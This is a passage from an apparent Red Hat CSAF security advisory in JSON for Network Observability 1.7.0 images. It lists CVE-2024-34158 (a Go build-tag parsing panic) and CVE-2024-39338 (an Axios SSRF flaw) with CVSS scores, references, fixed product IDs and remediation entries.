"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34158"
},
{
"category": "external",
"summary": "RHBZ#2310529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310529"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34158",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34158"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34158",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34158"
},
{
"category": "external",
"summary": "https://go.dev/cl/611240",
"url": "https://go.dev/cl/611240"
},
{
"category": "external",
"summary": "https://go.dev/issue/69141",
"url": "https://go.dev/issue/69141"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3107",
"url": "https://pkg.go.dev/vuln/GO-2024-3107"
}
],
"release_date": "2024-09-06T21:15:12.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-39338",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2024-08-13T17:21:32.774718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2304369"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: axios: Server-Side Request Forgery",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-39338"
},
{
"category": "external",
"summary": "RHBZ#2304369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304369"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases",
"url": "https://github.com/axios/axios/releases"
},
{
"category": "external",
"summary": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html",
"url": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html"
}
],
"release_date": "2024-08-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
